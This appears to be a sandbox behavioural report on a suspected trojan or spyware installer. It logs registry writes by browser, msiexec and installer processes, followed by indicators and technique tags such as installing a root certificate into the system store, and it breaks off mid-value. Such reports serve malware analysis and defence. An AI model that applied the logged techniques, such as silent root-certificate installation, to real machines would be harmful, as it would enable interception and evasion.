Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = eda47e9320aed701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "{179F3D56-1B0B-42B2-A962-59B7EF59FE1B}"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "930"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "1019"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "1025"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DefaultIcon	FileSyncConfig.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "16000"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "577"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "Microsoft Mark Mobile - English (United States)"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "695"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1021"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "1030"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "1031"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f073accaabb4d701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "You have selected %1 as the default voice."	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "339627787"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "Microsoft Speech Recognition Engine - en-US Embedded DNN v11.1"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "{2984A9DB-5689-43AD-877D-14999A15DD46}"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "1008"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "617"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1040"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{E95859F9-3BA7-4753-AB5F-34127D5CAB21}"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "280"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1023"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\SortOrderIndex = "66"	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\NumberOfSubdomain = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "200"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "1017"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QAM9LTZ0-JH7G-LF06-519I-JDH27ZPEPA24}\1 = "7600"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\Certificates	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1027"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 3	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "309C 309C 30A1 30A1 30A2 30A2 30A3 30A3 30A4 30A4 30A5 30A5 30A6 30A6 30A7 30A7 30A8 30A8 30A9 30A9 30AA 30AA 30AB 30AB 30AC 30AC 30AD 30AD 30AE 30AE 30AF 30AF 30B0 30B0 30B1 30B1 30B2 30B2 30B3 30B3 30B4 30B4 30B5 30B5 30B6 30B6 30B7 30B7 30B8 30B8 30B9 30B9 30BA 30BA 30BB 30BB 30BC 30BC 30BD 30BD 30BE 30BE 30BF 30BF 30C0 30C0 30C1 30C1 30C2 30C2 30C3 30C3 30C4 30C4 30C5 30C5 30C6 30C6 30C7 30C7 30C8 30C8 30C9 30C9 30CA 30CA 30CB 30CB 30CC 30CC 30CD 30CD 30CE 30CE 30CF 30CF 30D0 30D0 30D1 30D1 30D2 30D2 30D3 30D3 30D4 30D4 30D5 30D5 30D6 30D6 30D7 30D7 30D8 30D8 30D9 30D9 30DA 30DA 30DB 30DB 30DC 30DC 30DD 30DD 30DE 30DE 30DF 30DF 30E0 30E0 30E1 30E1 30E2 30E2 30E3 30E3 30E4 30E4 30E5 30E5 30E6 30E6 30E7 30E7 30E8 30E8 30E9 30E9 30EA 30EA 30EB 30EB 30EC 30EC 30ED 30ED 30EE 30EE 30EF 30EF 30F0 30F0 30F1 30F1 30F2 30F2 30F3 30F3 30F4 30F4 30F5 30F5 30F6 30F6 30F7 30F7 30F8 30F8 30F9 30F9 30FA 30FA 30FB 30FB 30FC 30FC 30FD 30FD 30FE 30FE 0021 0021 0027 0027 002B 002B 002E 002E 003F 003F 005F 005F 007C 007C"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "340"	MicrosoftEdgeCP.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

pid	Process
652	reg.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a1107